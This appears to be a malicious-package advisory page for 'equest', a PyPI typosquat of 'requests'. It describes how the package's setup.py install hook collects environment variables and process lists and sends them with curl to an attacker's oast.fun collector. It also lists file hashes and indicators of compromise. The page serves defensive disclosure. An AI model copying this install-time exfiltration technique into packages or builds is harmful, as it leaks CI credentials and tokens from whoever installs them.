Vulnerability-Lookup

MAL-2026-6289

Vulnerability from ossf_malicious_packages

Published

2026-06-23 12:07

Modified

2026-06-24 07:49

Summary

Malicious code in equest (PyPI)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094)

The package name equest is a one-character deletion of the widely-used requests package and ships no functional library code. setup.py registers custom install and egg_info cmdclasses so that on pip install or pip download, the package collects the full process environment (os.environ serialized as key=value pairs) and the output of ps -elf, then POSTs both to http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun via curl over plaintext HTTP. The destination is an Interactsh (oast.fun) collector subdomain controlled by the publisher. Any CI/build secrets present in the installer's environment at install time (cloud credentials, registry tokens, GitHub tokens, database credentials) are leaked to the attacker, and the running process list reveals additional host context. The README self-describes the package as a proof-of-concept of arbitrary code execution via pip install.

Source: kam193 (293431a944f3eb8829d76e452763b22243f23990da542630767c3f1431e92dc1)

During installation, the package exfiltrates env variables

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-ip-rotat

Reasons (based on the campaign):

The package overrides the install command in setup.py to execute malicious code during installation.
exfiltration-env-variables
typosquatting

CWE

CWE-506 - The product contains code that appears to be malicious in nature.

Credits

Amazon Inspector inspector-research@amazon.com

Kamil Mańkowski (kam193) github.com/kam193 bad-packages.kam193.eu/

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "setup.py",
              "sha256": "8bc5d48164d98e2402425cd2bbde0c572dc087fff7dce610665f8aae944a3fc1",
              "tlsh": "1f315e07e0bf29291ac354a0558f03959bc0e3a32b6431fab2fc29191f0a129103b8af"
            },
            {
              "path": "PKG-INFO",
              "sha256": "9966ff2a0a7599ad6d8ca74949977a50f579f49a5138e4e331b9e55dd8e4d32c",
              "tlsh": "0ba024147c30443345f505053c1403350370530c345f4c3c50150f004750054d0dc071"
            }
          ],
          "package_integrity": [
            {
              "filename": "equest-0.0.1-py3-none-any.whl",
              "hashes": {
                "blake2b_256": "d6c1e286eeba2c76b9aba625730c1902ba74d72c71a7b0b4ed05f2b70b90088c",
                "md5": "c61a05ffa3b6b55df1ddbc3fb7c4ab5b",
                "sha256": "a0fa76f33b41ae3d1b1d0ba0954a0881222bc3330ba4e12405bcc34fd4b3e32e"
              }
            },
            {
              "filename": "equest-0.0.1.tar.gz",
              "hashes": {
                "blake2b_256": "18be4ac8c7376cc802cc362475833ae270f98eac334f7a15f57de9a6ca0dc8b6",
                "md5": "86eb9ea08ebe6e4f2a3363de45663136",
                "sha256": "1673a0ce03f6867e139a0a182bf09078d9fc0c5a124ab9c36843f65dad5db47f"
              }
            }
          ]
        }
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "equest"
      },
      "versions": [
        "0.0.1"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://github.com/kam193",
        "https://bad-packages.kam193.eu/"
      ],
      "name": "Kamil Ma\u0144kowski (kam193)",
      "type": "REPORTER"
    }
  ],
  "database_specific": {
    "iocs": {
      "domains": [
        "gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun"
      ]
    },
    "malicious-packages-origins": [
      {
        "id": "pypi/2026-06-ip-rotat/equest",
        "import_time": "2026-06-23T13:28:20.413460091Z",
        "modified_time": "2026-06-23T12:07:23.994682Z",
        "sha256": "2bb3fce5427fc5a0a72380cf59e8396bf3409ceaead44f6a2df757f125b6e287",
        "source": "kam193",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "IN-MAL-2026-007333",
        "import_time": "2026-06-23T19:40:40.094438157Z",
        "modified_time": "2026-06-23T18:57:43Z",
        "sha256": "cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094",
        "source": "amazon-inspector",
        "versions": [
          "0.0.1"
        ]
      },
      {
        "id": "pypi/2026-06-ip-rotat/equest",
        "import_time": "2026-06-24T07:47:34.500747878Z",
        "modified_time": "2026-06-23T12:07:23.994682Z",
        "sha256": "293431a944f3eb8829d76e452763b22243f23990da542630767c3f1431e92dc1",
        "source": "kam193",
        "versions": [
          "0.0.1"
        ]
      }
    ]
  },
  "details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (cfe07e7f1e241dde491d3d6f5553ed2247a6f8e1dfdf34b0eaa9943a2cba5094)\nThe package name `equest` is a one-character deletion of the widely-used `requests` package and ships no functional library code. setup.py registers custom install and egg_info cmdclasses so that on `pip install` or `pip download`, the package collects the full process environment (`os.environ` serialized as `key=value` pairs) and the output of `ps -elf`, then POSTs both to `http://gjampdwmdjmppwedtkpbbdkq05f6iiz6r.oast.fun` via curl over plaintext HTTP. The destination is an Interactsh (oast.fun) collector subdomain controlled by the publisher. Any CI/build secrets present in the installer\u0027s environment at install time (cloud credentials, registry tokens, GitHub tokens, database credentials) are leaked to the attacker, and the running process list reveals additional host context. The README self-describes the package as a proof-of-concept of arbitrary code execution via `pip install`.\n\n## Source: kam193 (293431a944f3eb8829d76e452763b22243f23990da542630767c3f1431e92dc1)\nDuring installation, the package exfiltrates env variables\n\n\n---\n\nCategory: MALICIOUS - The campaign has clearly malicious intent, like infostealers.\n\n\nCampaign: 2026-06-ip-rotat\n\n\nReasons (based on the campaign):\n\n\n - The package overrides the install command in setup.py to execute malicious code during installation.\n\n\n - exfiltration-env-variables\n\n\n - typosquatting\n",
  "id": "MAL-2026-6289",
  "modified": "2026-06-24T07:49:20Z",
  "published": "2026-06-23T12:07:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://bad-packages.kam193.eu/pypi/package/equest"
    },
    {
      "type": "PACKAGE",
      "url": "https://pypi.org/project/equest/0.0.1/"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in equest (PyPI)"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted